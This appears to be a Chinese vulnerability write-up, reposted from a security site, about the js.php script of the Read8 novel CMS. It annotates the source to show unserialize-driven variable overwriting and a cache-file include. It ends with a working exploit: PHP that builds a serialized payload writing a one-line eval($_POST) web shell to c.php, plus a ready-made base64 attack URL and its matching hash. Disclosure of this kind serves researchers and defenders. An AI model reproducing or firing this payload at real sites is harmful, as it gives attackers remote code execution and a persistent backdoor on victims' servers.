./js.php
     $arguments = $hash = '';
02     isset($_GET['argument']) && $argument = $_GET['argument'];
03     isset($_GET['hash']) && $hash = $_GET['hash'];
04  $arguments = unserialize(base64_decode($argument)); //$arguments参数来自get （serialize一下在base64_encode一下。。）
05     print_r($arguments);
06     if(empty($arguments) || !is_array($arguments))
07     jsdie('Bad Request. Please check your argument.');
08     if(empty($hash) || $hash != md5($argument)) //条件1
09     jsdie('Bad Request. Please check your hash.');
10    
11     echo __TAB_NOVEL__;
12     foreach($arguments as $k => $v) //变量覆盖 往下看
13     $$k = $v;
14     echo "<h1>$YXNkYXNk||".$_SYSTEM['SYSTEM']['SITE_ADDR']."</h1>";
15    
16     if(empty($limit) || !ris_int($limit)) //条件2
17     jsdie('Bad Request. Please limit a number.');
18     省略若干
19    
20     switch($kind) {
21     case 'vip':
22     $table = __TAB_NOVEL__;
23     $where = 'vip = 1';
24     break;
25     case 'original':
26     $table = __TAB_NOVEL__;
27     $where = 'author_id > 0';
28     break;
29     case 'copied':
30     $table = __TAB_NOVEL__;
31     $where = 'author_id = 0';
32     break;
33     default :
34     $args = explode('_', $subject);
35     if(count($args) == 3 && $args[2] && ris_int($args[2])) {
36     $table = $args[0] == 'story' ? __TAB_STORY__ : __TAB_NOVEL__;
37     $where = ($args[1] == 'content' ? 'content' : 'subject').' = '.$args[2];
38     }
39     break;
40     }
41    
42     if(!$table) //条件3
43     jsdie('Bad Request. Please choose a method.');
44    
45     $jscachefile = ROOT."data/cache/js_$hash.php"; //hash是get进来的。。
46    
47     $update = false;
48     if(!file_exists($jscachefile) || (TIMESTAMP - filemtime($jscachefile) >= $cachetime))
49     $update = true;
50    
51     if($update) {
52     $content = "<?php if(!defined('IN_Read8')) exit('Access Denied'); ?>\n"; //必须在被执行文件里包含 继续看
53    
54     //$sql = "SELECT b.id, b.title, b.type_id, b.author, c.dateline, c.title as chapter_title, c.$cid AS cid, v.name as volume_name FROM ".__TAB_BOOK__." b LEFT JOIN ".__TAB_CHAPTER__." c ON b.newchapterid=c.id LEFT JOIN ".__TAB_VOLUME__." v ON v.id=c.volume_id WHERE $where ORDER BY b.updatetime DESC LIMIT $limit";
55     //$result=$db->query($sql);
56     $wblock = $db->select(array(
57     'field' => 'id, title, author, subject, content, dateline, lastupdate',
58     'from' => $table,
59     'where' => 'WHERE state IN (1, 2, 3) AND '.$where,
60     'order' => 'lastupdate DESC',
61     'limit' => $limit,
62     'filter'=> 'convert_'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'_classes',
63     ));
64    
65     $wblock = replace(html_show($wblock, false));
66     if(!empty($charset) && $charset != SYSCHARSET) $wblock = convert($wblock, SYSCHARSET, $charset);
67    
68     addjs('document.writeln("<style type=\"text/css\" />");');
69     addjs('document.writeln(" .update div.content {background: #F7F7F7;margin-top: 1px;width: 100%;padding: 5px 0;}");');
70     addjs('document.writeln(" .update div div.left {float: left;margin-left: 3px;width: 70%;}");');
71     addjs('document.writeln(" .update div div.right {float: right;margin-right: 3px;width: 20%;}");');
72     addjs('document.writeln("</style>");');
73     addjs('document.writeln("<div class=\"update\">");');
74    
75     $external = empty($openewindow) ? '' : ($openewindow == 'target' ? ' target=\"_blank\"' : (($openewindow == 'rel') ? ' rel=\"external\"' : ''));
76     foreach($wblock as $val) {
77     addjs('document.writeln("<table>");'); //我们利用变量覆盖 覆盖掉$_SYSTEM['SYSTEM']['SITE_ADDR']. 即可
78     addjs('document.writeln("<tr><td align=\"left\" width=\"70%\">&nbsp;['.$val['subject'].']&nbsp;<a href=\"'.$_SYSTEM['SYSTEM']['SITE_ADDR'].'/'.($table == __TAB_NOVEL__ ? 'novel' : 'story').'.php?bid='.$val['id'].'\"'.$external.' style=\"color: Green;\">'.$val['title'].'</a>&nbsp;</td>");');
79    
80     addjs('document.writeln("<td align=\"right\" width=\"30%\">'.$val['author'].'</a>&nbsp;&lt;'.rdate($val['lastupdate'], 'm-d').'&gt;</td></tr>");');
81     addjs('document.writeln("</table>");');
82     }
83     unset($wblock);
84    
85     addjs('document.writeln("</div>");');
86    
87     ;
88     if(!rfow($jscachefile, $content)) //rfow函数就是file put contents 代码我就不贴了
89     jsdie('Can\'t write cache file. Please check your permission.');
90     }
91    
92     (!include $jscachefile) && jsdie('Can\'t read cache file. Please check your permission.'); //包含 看起来和dede那段代码很像啊利用方法:
93    
94    
95     <?php
96     $a=array("limit"=>'1','_SYSTEM'=>array('SYSTEM'=>array('SITE_ADDR'=>"<?php file_put_contents('./c.php','<?php eval(\$_POST[s])?>')?>")),'kind'=>'original');
97     echo serialize($a);
98     ?>
 
生成一个serialize后的数组然后base64一下 www.2cto.com 然后再md5一下url：/js.php? argument=YTozOntzOjU6ImxpbWl0IjtzOjE6IjEiO3M6NzoiX1NZU1RFTSI7YToxOntzOjY6IlNZU1RFTSI7YToxOntzOjk6IlNJVEVfQUREUiI7czo2MjoiPD9waHAgZmlsZV9wdXRfY29udGVudHMoJy4vYy5waHAnLCc8P3BocCBldmFsKCRfUE9TVFtzXSk/PicpPz4iO319czo0OiJraW5kIjtzOjg6Im9yaWdpbmFsIjt9&hash=ccfe8712c8669cf53b3a049f7872de86 这个漏洞和dede的有点像 都是一个变量覆盖 然后查询数据库 然后写出文件 然后包含 过程比较像而已。。本地测试。。
 
 
 
1       <A id=ematt:90 href="/content/uploadfile/201203/eb9fcafce2f193e736c0f60f295b838020120317035959.png" target=_blank jQuery1332059982027="6"><IMG border=0 alt=点击查看原图src="/content/uploadfile/201203/thum-eb9fcafce2f193e736c0f60f295b838020120317035959.png"></A>
 
作者 狗一样的男人